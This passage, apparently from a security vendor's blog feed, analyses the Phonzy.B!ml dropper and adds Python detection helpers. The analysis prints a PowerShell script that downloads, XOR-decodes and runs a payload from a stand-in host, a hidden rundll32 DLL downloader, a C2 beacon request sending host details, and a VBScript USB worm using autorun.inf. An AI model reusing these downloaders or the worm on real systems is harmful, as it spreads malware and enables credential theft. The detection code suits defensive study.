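            streak[name] = streak[name] + 1 if cpu >= threshold else 0
            if streak[name] >= min_consecutive:
                flagged.add(name)
        for name in list(streak):
            if name not in seen:
                streak[name] = 0
    return sorted(flagged)


# Constructed readings, one dict per sampling interval (e.g. every 10 seconds).
SAMPLE_CPU = [
    {"Bitfiat.exe": 86.0, "chrome.exe": 95.0, "MsMpEng.exe": 12.0},
    {"Bitfiat.exe": 91.0, "chrome.exe": 18.0, "MsMpEng.exe": 40.0},
    {"Bitfiat.exe": 88.5, "chrome.exe": 9.0, "MsMpEng.exe": 85.0},
    {"Bitfiat.exe": 93.0, "chrome.exe": 22.0, "MsMpEng.exe": 87.0},
    {"Bitfiat.exe": 90.0, "chrome.exe": 4.0, "MsMpEng.exe": 10.0},
]

if __name__ == "__main__":
    print("sustained high CPU:", sustained_high_cpu(SAMPLE_CPU))
```

On a live system the dictionaries would be filled from Task Manager's data source (for instance by polling process CPU times at the chosen interval); the streak logic does not change.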

How To Remove Bitfiat?

Effective removal of the crypto miner requires a complex approach to neutralize all malware actions. Unlike other types of malware, a miner can overload the system so that the removal tool has no resources left. To avoid these issues, the removal guide should have one more step.

  • Download and install GridinSoft Anti-Malware. The first thing to do is to deploy the removal tool, even though it will be used later.
  • Switch your Windows to Safe Mode with Networking. By booting into Safe Mode with Networking, you prevent the Bitfiat process from exerting its influence on the CPU. This will facilitate uninterrupted removal by antivirus software.
  • Start the Full Scan. By running a Full Scan, you make the program check every single element of the system. Such a thorough scan is essential to ensure that all the malware present in the system is removed. After the scan, click “Clean Now” to get rid of all the detected items.

How to Remove Trojan:Script/Phonzy.B!ml Malware
https://gridinsoft.com/blogs/trojanscript-phonzy-removal-guide/
Tue, 27 Feb 2024 08:45:57 +0000

The post How to Remove Trojan:Script/Phonzy.B!ml Malware appeared first on Gridinsoft Blog.

]]>
Trojan:Script/Phonzy.B!ml is a generic detection name used by Microsoft Defender for a dangerous loader malware. This threat primarily functions as a dropper, downloading and executing additional malicious payloads onto infected systems. In numerous documented infection cases, Phonzy trojan has been observed delivering banking trojans designed to steal financial credentials.

Attribute            Details
Threat Name          Trojan:Script/Phonzy.B!ml
Type                 Dropper, Loader, Trojan
Detection Method     Machine Learning (ML) by Microsoft Defender
Primary Functions    Downloading additional malware, system reconnaissance, data theft
Propagation          Phishing emails, malicious websites, cracked software, USB drives
Risks                Banking trojan infection, credential theft, complete system compromise
Removal Difficulty   Moderate to High (anti-malware tool recommended)

Trojan:Script/Phonzy.B!ml Overview

Trojan:Script/Phonzy.B!ml is a generic detection name that Microsoft Windows Defender uses to identify a family of similar malware threats. While these malicious programs may share behavioral patterns and code characteristics, they often belong to different malware families, making complete identification challenging through automated detection alone.

Microsoft Defender alert showing Trojan:Script/Phonzy.B!ml detection with severe threat level

Functionally, Phonzy.B!ml operates as a scripted dropper malware. Its primary purpose is to download and execute additional malicious payloads without requiring user interaction. Beyond this core function, Phonzy samples are designed to collect extensive information about the infected system, including geographical location, operating system details, installed applications, and hardware specifications. The typical payload delivered in Phonzy malware attacks consists of sophisticated banking trojans – specialized credential stealers that target online banking information, financial credentials, and digital payment data.

Is Phonzy B!ml a False Positive?

Looking deeper at Microsoft’s detection naming conventions reveals that the “!ml” suffix stands for “machine learning”, indicating that the threat was identified by Microsoft’s artificial intelligence detection engine. While highly effective, machine learning detection sometimes requires confirmation through traditional signature-based systems. Without this secondary verification, the possibility of false positive detections increases significantly.

Unfortunately, reliably distinguishing a false positive from an actual Phonzy infection can be challenging. Modern malware employs sophisticated obfuscation techniques to blend in with legitimate system files, so file location alone is not enough to tell them apart. For this reason, we strongly recommend scanning your system with GridinSoft Anti-Malware to obtain a definitive analysis and ensure complete removal of any threats.

Phonzy.B!ml Technical Analysis

Since Phonzy is a generic detection name covering multiple malware variants, identifying a single representative sample for analysis presents challenges. To provide a comprehensive understanding of this threat, we’ve analyzed several specimens to document the full range of capabilities. In summary, while Phonzy appears to be a relatively simple dropper on the surface, it can cause extensive damage to infected systems through the secondary malware it deploys.

Infection Vector and Launch Mechanism

The majority of Phonzy samples we’ve encountered arrive in an obfuscated, packed form – typically encrypted and/or archived. This packaging serves two primary purposes: evading static detection mechanisms and complicating forensic analysis. In the case of Phonzy variants, evading detection appears to be the primary motivation.

Process monitoring showing Phonzy malware unpacking and launching payload

To execute the unpacking process, Phonzy relies on the initial script that downloads the malware to the target system. This is typically a PowerShell script that retrieves the dropper from an intermediary command and control (C2) server. Below is an example of a typical obfuscated PowerShell script used in Phonzy distribution:

$e3Df = [System.IO.Path]::GetTempPath();
$k9jL = "$e3Df\t8R4.exe";
$w32c = New-Object System.Net.WebClient;
$w32c.Headers.Add("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36");
try {
    $w32c.DownloadFile("hxxp://malicious-server.com/payload.bin", $k9jL);
    $b9Te = [System.IO.File]::ReadAllBytes($k9jL);
    for($i=0; $i -lt $b9Te.length; $i++) {
        $b9Te[$i] = $b9Te[$i] -bxor 0x43;
    }
    [System.IO.File]::WriteAllBytes($k9jL, $b9Te);
    Start-Process $k9jL;
} catch {
    Remove-Item $k9jL -ErrorAction SilentlyContinue;
}

The script above demonstrates how Phonzy is downloaded, decrypted with a simple XOR operation, and then executed on the target system. In a real attack, this script would be significantly more obfuscated to avoid detection.
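For defenders, the useful counterpart to the script above is being able to recognise this download-decode-execute chain in script content, and to undo the XOR when a still-encoded payload is captured from the network or from disk. The Python helpers below are an added example, not code from the post or from any product: the indicator patterns are my own (the post's script is embedded as the test input), and the payload blob is a constructed fake PE header XOR'd with the sample's key, not a real sample.

```python
"""Triage helpers for a PowerShell download-decode-execute chain.

Added example (not code from the Gridinsoft post). Two defensive pieces:
  * score_dropper_script() checks script text for the indicator chain the
    post's sample shows and returns which indicators matched;
  * recover_xor_payload() undoes the single-byte XOR so an analyst can
    inspect a captured, still-encoded payload; if the key is unknown it is
    derived from the 'MZ' header every Windows executable starts with.
"""
import re

# The post's sample script, embedded here as the test input.
SAMPLE_SCRIPT = r"""
$e3Df = [System.IO.Path]::GetTempPath();
$k9jL = "$e3Df\t8R4.exe";
$w32c = New-Object System.Net.WebClient;
$w32c.Headers.Add("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36");
try {
    $w32c.DownloadFile("hxxp://malicious-server.com/payload.bin", $k9jL);
    $b9Te = [System.IO.File]::ReadAllBytes($k9jL);
    for($i=0; $i -lt $b9Te.length; $i++) {
        $b9Te[$i] = $b9Te[$i] -bxor 0x43;
    }
    [System.IO.File]::WriteAllBytes($k9jL, $b9Te);
    Start-Process $k9jL;
} catch {
    Remove-Item $k9jL -ErrorAction SilentlyContinue;
}
"""

# Indicator name and a case-insensitive pattern over the script text (my own heuristics).
INDICATORS = [
    ("webclient_download", re.compile(r"Net\.WebClient\b.*?\bDownloadFile\(", re.I | re.S)),
    ("temp_path_drop", re.compile(r"GetTempPath\(\)", re.I)),
    ("xor_decode_loop", re.compile(r"for\s*\(.*?\)\s*\{[^}]*-bxor\s+0x[0-9a-f]+", re.I | re.S)),
    ("write_decoded_file", re.compile(r"WriteAllBytes\(", re.I)),
    ("start_process", re.compile(r"Start-Process\b", re.I)),
    ("cleanup_on_failure", re.compile(r"catch\s*\{[^}]*Remove-Item", re.I | re.S)),
]


def score_dropper_script(script: str) -> dict:
    """Return the matched indicators and whether the full chain is present."""
    matched = [name for name, rx in INDICATORS if rx.search(script)]
    # A single indicator (GetTempPath, Start-Process) is common in benign admin
    # scripts; the download -> decode -> execute chain is what actually counts.
    chain = {"webclient_download", "xor_decode_loop", "start_process"} <= set(matched)
    return {"indicators": matched, "download_decode_execute": chain}


def xor_bytes(data: bytes, key: int) -> bytes:
    """Single-byte XOR, the same operation the sample's loop performs."""
    return bytes(b ^ key for b in data)


def recover_xor_payload(blob: bytes, key=None):
    """Return (key, decoded bytes); (None, None) if no key turns the start into 'MZ'."""
    if key is None and len(blob) >= 2:
        candidate = blob[0] ^ 0x4D          # the only key that maps byte 0 to 'M'
        if blob[1] ^ candidate == 0x5A:     # it must also map byte 1 to 'Z'
            key = candidate
    if key is None:
        return None, None
    return key, xor_bytes(blob, key)


# Constructed stand-in for a captured payload.bin: a fake PE header XOR'd with
# the key from the sample script (0x43). Not a real executable.
SAMPLE_BLOB = xor_bytes(b"MZ\x90\x00\x03\x00\x00\x00This program cannot be run in DOS mode.", 0x43)
```

Scoring on the chain rather than on any one call keeps ordinary administration scripts from lighting up; the key recovery relies on nothing but the fixed two-byte PE signature, so it also works when the analyst only has the encoded file and not the script.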

We recently documented a sophisticated campaign that bypasses traditional infection steps by tricking users into running malicious PowerShell scripts directly. While that campaign delivered Lumma Stealer, the same infrastructure and techniques could easily be adapted to distribute Phonzy variants or any other malware family.

System Reconnaissance

Once successfully executed, Trojan:Script/Phonzy.B!ml begins collecting comprehensive information about the compromised system. This reconnaissance phase typically includes gathering details about:

  • Operating system version and architecture
  • Hardware specifications (CPU, RAM, disk space)
  • Installed applications and security software
  • Connected devices and peripherals
  • Geographic location based on IP address
  • User account information and privileges
  • Browser data and saved credentials

This information is used to create a unique fingerprint of the infected system, allowing attackers to track individual infections and potentially tailor subsequent payloads accordingly. Some advanced Phonzy.B!ml variants also include functionality to capture screenshots of the victim’s desktop, providing attackers with visual information about the compromised environment.

System information log collected by a Phonzy sample during reconnaissance phase

Command and Control Communication

Following the reconnaissance phase, Phonzy establishes communication with its command and control infrastructure. The malware sends an HTTP POST request to the C2 server, notifying the attackers of the new infection and transmitting the collected system information. Depending on the response received from the server, the malware may:

  • Remain dormant to avoid detection
  • Download additional malware payloads
  • Execute specific commands on the infected system
  • Uninstall itself if the target is deemed unsuitable

While the C2 communication protocols employed by Phonzy variants are relatively simplistic, they are designed to blend in with normal web traffic to avoid detection by network monitoring solutions. Below is an example of a typical HTTP request pattern used by Phonzy:

POST /gate.php HTTP/1.1
Host: malicious-server.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 2048

id=MACHINE_ID&os=Windows+10+Pro&arch=x64&av=Windows+Defender&installed=Chrome,Office,Adobe&admin=true&version=1.2
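One way to turn the request pattern above into a triage check is to parse a captured request and report which beacon-style traits it carries. The Python below is an added example, not code from the post: the field names and the /gate.php path come from the sample, while the scoring rules (four or more fingerprint fields, an "av" field, admin=true) are my own assumptions. The sample's declared Content-Length of 2048 does not match the short body shown, so the parser reports that mismatch too; it is a useful sanity check when the text you are looking at has been abbreviated.

```python
"""Parse a captured HTTP request and flag beacon-style indicators.

Added example, not code from the post. Input is raw request text as found in
a packet capture or a proxy that logs bodies. Rules mirror the post's sample:
a POST to a check-in endpoint, a form-urlencoded body carrying host
fingerprint fields, and a Content-Length that disagrees with the body sent.
"""
from urllib.parse import parse_qs

FINGERPRINT_KEYS = {"id", "os", "arch", "av", "installed", "admin", "version"}
GATE_PATHS = ("/gate.php",)   # assumed check-in path, taken from the sample

# The post's sample request, embedded as test input (CRLF endings as on the wire).
SAMPLE_REQUEST = (
    "POST /gate.php HTTP/1.1\r\n"
    "Host: malicious-server.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 2048\r\n"
    "\r\n"
    "id=MACHINE_ID&os=Windows+10+Pro&arch=x64&av=Windows+Defender"
    "&installed=Chrome,Office,Adobe&admin=true&version=1.2"
)


def parse_http_request(raw: str) -> dict:
    """Split raw request text into method, path, lower-cased headers and body."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    request_line, *header_lines = head.split("\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers, "body": body}


def analyze_beacon(raw: str) -> dict:
    """Return decoded form fields plus the names of the indicators that fired."""
    req = parse_http_request(raw)
    findings = []
    if req["method"] == "POST" and req["path"].lower().endswith(GATE_PATHS):
        findings.append("post_to_gate_endpoint")
    fields = {}
    if req["headers"].get("content-type", "").startswith("application/x-www-form-urlencoded"):
        # parse_qs decodes '+' to space, so os=Windows+10+Pro becomes "Windows 10 Pro"
        fields = {k: v[0] for k, v in parse_qs(req["body"]).items()}
    if len(FINGERPRINT_KEYS & set(fields)) >= 4:
        findings.append("host_fingerprint_fields")
    if fields.get("av"):
        findings.append("reports_security_product")
    if fields.get("admin", "").lower() == "true":
        findings.append("reports_admin_privileges")
    declared = req["headers"].get("content-length")
    actual = len(req["body"].encode())
    if declared is not None and declared.isdigit() and int(declared) != actual:
        findings.append("content_length_mismatch")
    return {"fields": fields, "findings": findings,
            "declared_length": declared, "actual_length": actual}
```

Because the traffic is plain HTTP with a browser-like User-Agent, the header alone is unremarkable; it is the combination of the check-in path with a body that enumerates the host's OS, security product and privilege level that separates this from a normal form submission.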

Secondary Payload Delivery

The primary function of Phonzy Trojan is downloading and executing secondary malware payloads. Upon receiving instructions from the C2 server, Phonzy will download additional malware from specified URLs, typically compromised websites used as intermediary distribution points to obscure the actual source of the malicious code.

For executing secondary payloads, Phonzy employs several techniques depending on the payload type:

  • Executable Files (.exe): Direct execution through process creation
  • Dynamic Link Libraries (.dll): Loaded through DLL hijacking or injection into legitimate processes
  • Script Files (.ps1, .vbs, .js): Executed through appropriate scripting engines
  • Document Files (.doc, .xls): Opened with legitimate applications to trigger embedded macros

The following PowerShell code demonstrates how Phonzy might execute a downloaded DLL payload through rundll32:

# Function to download and execute DLL payload
function Invoke-DllPayload {
    param(
        [string]$PayloadUrl,
        [string]$EntryPoint
    )
    
    $TempPath = [System.IO.Path]::GetTempPath()
    $PayloadPath = Join-Path $TempPath ([System.Guid]::NewGuid().ToString() + ".dll")
    
    try {
        # Download the DLL
        (New-Object System.Net.WebClient).DownloadFile($PayloadUrl, $PayloadPath)
        
        # Execute the DLL using rundll32
        $Command = "rundll32.exe $PayloadPath,$EntryPoint"
        Start-Process -FilePath "cmd.exe" -ArgumentList "/c $Command" -WindowStyle Hidden
        
        return $true
    }
    catch {
        return $false
    }
}

# Call the function with parameters from C2 server
Invoke-DllPayload -PayloadUrl "hxxp://compromised-site.com/payload.dll" -EntryPoint "DllMain"

USB Drive Propagation

Some advanced variants of Phonzy.B!ml include self-propagation capabilities, allowing the malware to spread via attached USB drives and other removable storage media. This worm-like behavior is relatively uncommon in modern malware, as security vendors have developed robust detection methods for such propagation techniques. However, this approach remains effective in certain environments, particularly those with limited security measures or air-gapped networks.

The USB infection mechanism typically works by:

  1. Monitoring for newly connected USB storage devices
  2. Creating hidden folders on the device to store malware payloads
  3. Modifying or creating autorun.inf files to trigger execution when connected to a new system
  4. Converting legitimate executables on the drive into infected versions
  5. Creating shortcut files that execute malware while opening legitimate content

The following is a simplified example of code that might be used by Phonzy to monitor for and infect USB drives:

' VBScript example of USB drive infection mechanism
Option Explicit

Dim fso, wsh, drives, drive
Set fso = CreateObject("Scripting.FileSystemObject")
Set wsh = CreateObject("WScript.Shell")

' Monitor for new drives
Sub MonitorDrives()
    On Error Resume Next
    
    ' Get current drives
    Set drives = fso.Drives
    
    ' Check each drive
    For Each drive in drives
        ' Look for removable drives
        If drive.DriveType = 1 And drive.IsReady Then
            InfectDrive drive.Path
        End If
    Next
    
    ' Continue monitoring
    WScript.Sleep 5000
    MonitorDrives
End Sub

' Infect a specific drive
Sub InfectDrive(drivePath)
    On Error Resume Next
    
    ' Create hidden folder
    fso.CreateFolder drivePath & "\System Volume Information"
    wsh.Run "attrib +h +s """ & drivePath & "\System Volume Information""", 0, True
    
    ' Copy malware payload
    fso.CopyFile WScript.ScriptFullName, drivePath & "\System Volume Information\svchost.exe"
    
    ' Create autorun.inf
    Dim autorun
    Set autorun = fso.CreateTextFile(drivePath & "\autorun.inf", True)
    autorun.WriteLine "[AutoRun]"
    autorun.WriteLine "open=System Volume Information\svchost.exe"
    autorun.WriteLine "action=Open files on this drive"
    autorun.Close
    
    ' Hide autorun.inf
    wsh.Run "attrib +h +s """ & drivePath & "\autorun.inf""", 0, True
    
    ' Create shortcuts to legitimate files
    CreateMaliciousShortcuts drivePath
End Sub

' Create malicious shortcuts to existing files
Sub CreateMaliciousShortcuts(drivePath)
    ' Implementation details omitted for brevity
End Sub

' Start monitoring
MonitorDrives
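From the defender's side, the artefacts the script writes are exactly what a scan of a suspect USB drive should look for. The Python below is an added example, not code from the post: it checks a drive root for an autorun.inf that launches an executable, executables planted under "System Volume Information", and .lnk shortcuts that shadow a real file of the same name. The infected drive layout is constructed in a temporary directory for the demonstration; point scan_drive_root() at a mounted drive to use it for real.

```python
"""Check a removable drive root for the USB-infection traces described above.

Added example, not code from the post. It looks for the three artefacts the
VBScript leaves: an autorun.inf whose open=/shellexecute= entry launches an
executable, executables under "System Volume Information" (a Windows-managed
folder that should hold no user programs), and .lnk shortcuts that shadow a
real file of the same name. The sample drive is constructed in a temp dir.
"""
import configparser
import tempfile
from pathlib import Path

EXEC_EXT = {".exe", ".scr", ".com", ".bat", ".cmd", ".vbs", ".js", ".ps1"}


def parse_autorun(path: Path) -> list:
    """Return (key, target) pairs from autorun.inf that point at an executable."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(path.read_text(errors="ignore"))
    launches = []
    for section in cp.sections():
        if section.lower() != "autorun":
            continue
        for key, target in cp.items(section):     # keys are lower-cased by configparser
            if key in ("open", "shellexecute") and any(ext in target.lower() for ext in EXEC_EXT):
                launches.append((key, target))
    return launches


def scan_drive_root(root: Path) -> list:
    """Return (finding, detail) tuples for a drive root; empty list means clean."""
    findings = []
    autorun = root / "autorun.inf"
    if autorun.is_file():
        for key, target in parse_autorun(autorun):
            findings.append(("autorun_launches_executable", f"{key}={target}"))
    svi = root / "System Volume Information"
    if svi.is_dir():
        try:
            for p in svi.rglob("*"):
                if p.is_file() and p.suffix.lower() in EXEC_EXT:
                    findings.append(("executable_in_system_volume_information",
                                     p.relative_to(root).as_posix()))
        except PermissionError:
            pass   # a genuine SVI folder is access-denied on Windows: nothing to report
    # Report.lnk next to Report.docx is the "open the real file, run the payload too" trick.
    real_names = {p.stem.lower() for p in root.iterdir() if p.suffix.lower() != ".lnk"}
    for lnk in root.glob("*.lnk"):
        if lnk.stem.lower() in real_names:
            findings.append(("shortcut_shadows_file", lnk.name))
    return findings


def build_sample_drive(infected: bool = True) -> Path:
    """Constructed layout mimicking what the VBScript above would leave behind."""
    root = Path(tempfile.mkdtemp(prefix="usb_sample_"))
    (root / "Report.docx").write_bytes(b"PK placeholder document")
    (root / "Photos").mkdir()                       # untouched folder, must not be reported
    if infected:
        svi = root / "System Volume Information"
        svi.mkdir()
        (svi / "svchost.exe").write_bytes(b"MZ placeholder, not a real executable")
        (root / "autorun.inf").write_text(
            "[AutoRun]\nopen=System Volume Information\\svchost.exe\naction=Open files on this drive\n")
        (root / "Report.lnk").write_bytes(b"L\x00\x00\x00 placeholder shortcut")
    return root


if __name__ == "__main__":
    for kind, detail in scan_drive_root(build_sample_drive()):
        print(f"{kind}: {detail}")
```

Current Windows versions do not honour autorun.inf on USB mass-storage devices, so that entry is evidence of tampering rather than an active launch path; the shortcut that shadows a real document is the piece that still depends on a user double-clicking, which is why the scan reports it separately.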

How To Remove Trojan:Script/Phonzy.B!ml

Removing Phonzy B!ml malware requires a thorough approach due to its ability to download multiple malicious payloads and establish persistence mechanisms. We strongly recommend using GridinSoft Anti-Malware, which is specifically designed to detect and eliminate complex malware threats including all components and payloads associated with Phonzy infections.

Automated Removal with GridinSoft Anti-Malware

Follow these steps to completely remove Trojan:Script/Phonzy.B!ml and any associated malware from your system:

Step 1: Download and Install GridinSoft Anti-Malware

Download GridinSoft Anti-Malware using the button below. Before starting the installation, disconnect from the internet and close all browser windows to prevent any potential interference from active malware.

Step 2: Run a Full System Scan

Launch GridinSoft Anti-Malware and select the “Full Scan” option to conduct a comprehensive examination of your entire system. This will detect Phonzy.B!ml and any other malware that may have been downloaded as secondary payloads.

GridinSoft Anti-Malware scan interface showing scan options and progress

Step 3: Remove All Detected Threats

After the scan completes, review the list of detected threats. Select all items and click “Clean Now” to remove Phonzy.B!ml and all associated malware components from your system.

GridinSoft Anti-Malware detection results showing Phonzy malware components with Clean Now button

Step 4: Reset Your Browsers

Since banking trojans commonly delivered by Phonzy target browser data, it’s essential to reset all installed browsers to remove any malicious extensions, hijacked settings, or injected code:

  1. In GridinSoft Anti-Malware, navigate to the “Tools” tab
  2. Select “Reset Browser Settings”
  3. Choose all browsers installed on your system
  4. Click “Reset” to restore browsers to their default state

GridinSoft Anti-Malware browser reset tool interface showing browser selection options

Step 5: Scan Removable Devices

Since some Phonzy variants can spread via USB drives, scan all removable storage devices that have been connected to your computer:

  1. Connect each USB drive or external storage device one at a time
  2. In GridinSoft Anti-Malware, select “Custom Scan”
  3. Choose the connected removable drive
  4. Complete a full scan and remove any detected threats

Step 6: Enable Proactive Protection

To prevent future infections, enable GridinSoft Anti-Malware’s proactive protection features:

  1. Navigate to the “Protect” tab
  2. Enable “Real-Time Protection” to guard against future threats
  3. Enable “Removable Device Protection” to prevent USB-based infections
  4. Click “Apply” to save your protection settings

GridinSoft Anti-Malware protection settings panel showing security options enabled

Manual Removal Instructions for Advanced Users

While automated removal is strongly recommended, technically proficient users may attempt manual removal. Be aware that this approach requires advanced system knowledge and carries risks if performed incorrectly.

Step 1: Boot into Safe Mode

  1. Press Win + R, type “msconfig” and press Enter
  2. Go to the “Boot” tab
  3. Check “Safe boot” and select “Minimal”
  4. Click “Apply” and “OK”
  5. Restart your computer when prompted

Step 2: Stop Malicious Processes

  1. Press Ctrl + Shift + Esc to open Task Manager
  2. Look for suspicious processes (random names, system locations, high resource usage)
  3. Right-click suspicious processes and select “End Task”
  4. For persistent processes, note their location for later removal

Step 3: Remove Malicious Files

Common Phonzy file locations include:

C:\Users\[Username]\AppData\Roaming\[random name].exe
C:\Users\[Username]\AppData\Local\Temp\[random name].exe
C:\Windows\Temp\[random name].dll
C:\ProgramData\[random name]\[random name].exe

Step 4: Remove Registry Entries

Press Win + R, type “regedit” and press Enter. Look for and delete these registry entries:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\[random name]
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\[random name]
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\[random name]

Step 5: Disable Malicious Scheduled Tasks

  1. Press Win + R, type “taskschd.msc” and press Enter
  2. Look for tasks with random names or suspicious actions
  3. Right-click suspicious tasks and select “Delete”
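Rather than eyeballing Run keys and the Task Scheduler one entry at a time, the manual steps above can be turned into a repeatable triage of exported data. The Python below is an added example, not code from the post: it parses a `reg export` of a Run key (.reg text) and the CSV produced by `schtasks /query /fo CSV /v`, and flags entries whose command line sits in one of the drop locations listed in Step 3. The column names "TaskName" and "Task To Run" are assumed from that command's output, and both inputs are constructed samples, random-looking names included.

```python
"""Triage exported autostart entries against the drop locations listed above.

Added example, not code from the post. Inputs are text you export yourself:
a `reg export` of a Run key (.reg format, string values only) and the CSV
from `schtasks /query /fo CSV /v` (column names "TaskName" and "Task To Run"
are assumed from that command). Both samples below are constructed.
"""
import csv
import io
import re

# Drop locations from the post's manual-removal section (case-insensitive).
SUSPECT_LOCATIONS = [
    ("appdata_roaming_root", re.compile(r"\\AppData\\Roaming\\[^\\]+\.exe", re.I)),
    ("user_temp", re.compile(r"\\AppData\\Local\\Temp\\", re.I)),
    ("windows_temp", re.compile(r"\\Windows\\Temp\\", re.I)),
    ("programdata_subdir", re.compile(r"^[A-Z]:\\ProgramData\\[^\\]+\\[^\\]+\.exe", re.I)),
]

# Constructed .reg export: one legitimate entry (OneDrive) and two suspect ones.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\user\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"kxq7s"="C:\\Users\\user\\AppData\\Roaming\\kxq7s.exe"
"Updater"="C:\\Users\\user\\AppData\\Local\\Temp\\upd.exe"
'''

# Constructed schtasks CSV with the assumed column names; one Microsoft task, one suspect.
SAMPLE_TASKS = "\n".join([
    r'"HostName","TaskName","Next Run Time","Status","Logon Mode","Last Run Time","Last Result","Author","Task To Run"',
    r'"DESKTOP-01","\Microsoft\Windows\Defrag\ScheduledDefrag","N/A","Ready","Interactive/Background","N/A","0","Microsoft Corporation","%windir%\system32\defrag.exe -c -h"',
    r'"DESKTOP-01","\WinUpd","N/A","Ready","Interactive only","N/A","0","DESKTOP-01\user","C:\ProgramData\qzr4k\qzr4k.exe"',
])


def classify_command(cmd: str) -> list:
    """Return the names of the location rules a command line matches (empty = no hit)."""
    target = cmd.strip().strip('"')          # many Run values wrap the path in quotes
    return [name for name, rx in SUSPECT_LOCATIONS if rx.search(target)]


def parse_reg_export(text: str):
    """Yield (key, value_name, data) for REG_SZ values in a .reg export."""
    key = None
    line_rx = re.compile(r'"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
        elif key and line.startswith('"'):
            m = line_rx.match(line)
            if m:                                 # dword:/hex: values are skipped
                data = m.group(2).replace('\\"', '"').replace("\\\\", "\\")
                yield key, m.group(1), data


def audit_run_key(reg_text: str) -> list:
    hits = []
    for key, name, data in parse_reg_export(reg_text):
        rules = classify_command(data)
        if rules:
            hits.append({"source": key, "name": name, "command": data, "rules": rules})
    return hits


def audit_scheduled_tasks(csv_text: str) -> list:
    hits = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        cmd = row.get("Task To Run", "") or ""
        rules = classify_command(cmd)
        if rules:
            hits.append({"source": row.get("TaskName", ""), "command": cmd, "rules": rules})
    return hits


if __name__ == "__main__":
    for hit in audit_run_key(SAMPLE_REG) + audit_scheduled_tasks(SAMPLE_TASKS):
        print(hit)
```

Hits are a starting point for review, not a verdict: legitimate software also installs under ProgramData, so check the publisher and signature of each flagged binary before deleting anything, and keep the exported .reg file so the key can be restored if a removal turns out to be wrong.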

Prevention Recommendations

To protect your system from Trojan:Script/Phonzy.B!ml and similar threats, implement these security best practices:

  • Avoid pirated software and unauthorized downloads – Cracked software is frequently used to distribute malware like Phonzy
  • Be cautious with email attachments – Never open attachments from unknown senders or unexpected messages
  • Keep systems and software updated – Install security updates promptly to patch vulnerabilities
  • Use advanced security software – GridinSoft Anti-Malware provides proactive protection against emerging threats
  • Enable USB drive protection – Utilize security features that scan removable media before accessing its contents
  • Be wary of fake download sites – Verify website legitimacy before downloading any software
  • Implement regular backups – Maintain current backups of important data to minimize impact of potential infections

GridinSoft Anti-Malware’s Removable Device Protection feature is particularly effective at blocking attempts by Phonzy and other malware to infect systems via USB drives, providing an essential layer of protection against this specific infection vector.

Frequently Asked Questions

How does Trojan:Script/Phonzy.B!ml infect systems?

Trojan:Script/Phonzy.B!ml typically infects systems through several methods, including phishing emails with malicious attachments, drive-by downloads from compromised websites, bundled software installations (especially cracked or pirated software), and infected USB drives. The initial infection usually involves a PowerShell or other script that downloads and executes the main Phonzy payload, which then contacts its command and control server for further instructions and additional malware downloads.

What damage can Phonzy.B!ml cause to my computer?

While Phonzy.B!ml itself primarily functions as a dropper, the secondary payloads it delivers can cause extensive damage. Banking trojans commonly delivered by Phonzy can steal financial credentials, leading to unauthorized transactions and identity theft. Other potential payloads include ransomware that encrypts your files, cryptominers that consume system resources, and backdoors that provide attackers with persistent access to your system. Additionally, the system reconnaissance performed by Phonzy compromises your privacy by collecting and transmitting sensitive information about your computer and browsing habits.

Why does Microsoft Defender label this threat with ‘!ml’ in its name?

The ‘!ml’ suffix in Microsoft Defender detection names indicates that the threat was identified using machine learning algorithms rather than traditional signature-based detection. This approach allows Microsoft to detect previously unseen malware variants based on behavioral similarities to known threats. While machine learning detection provides excellent protection against emerging threats, it occasionally results in false positives. When you see the ‘!ml’ designation, it’s advisable to verify the detection using a specialized anti-malware tool like GridinSoft Anti-Malware, which employs multiple detection techniques to provide more definitive results.

Can Phonzy.B!ml steal my banking credentials?

Phonzy.B!ml itself doesn’t directly steal banking credentials, but it frequently downloads and installs banking trojans specifically designed for this purpose. These secondary payloads employ various techniques to capture financial information, including keylogging (recording keystrokes), form grabbing (capturing data entered into web forms), screen capturing during banking sessions, and web injection (inserting malicious code into banking websites to harvest credentials). To protect your financial information after a Phonzy infection, you should completely remove all malware, reset your browsers, change passwords for all financial accounts using a clean device, and monitor your accounts for unauthorized activity.

The post How to Remove Trojan:Script/Phonzy.B!ml Malware appeared first on Gridinsoft Blog.

Oneetx.exe
https://gridinsoft.com/blogs/oneetx-removal/
Tue, 13 Jun 2023 15:56:39 +0000

Oneetx.exe is a malicious process related to the Amadey dropper malware. It can be spotted in Task Manager, with seemingly nothing suspicious about it – if you don’t know what it stands for. Let me show you how it appears and how you can remove it.

What is Oneetx.exe process?

Oneetx.exe is a disguised name chosen by the Amadey dropper developers to hide their malware among other processes. Windows tracks all processes running in the system and displays them in Task Manager. Obviously, obfuscated names like sv39103.exe will attract attention and raise suspicion. That is why hackers opt for ordinary-looking names, usually those of system processes or of popular software packages, like Photoshop or crypto mining software. This case, however, is different.

Oneetx.exe process in Task Manager

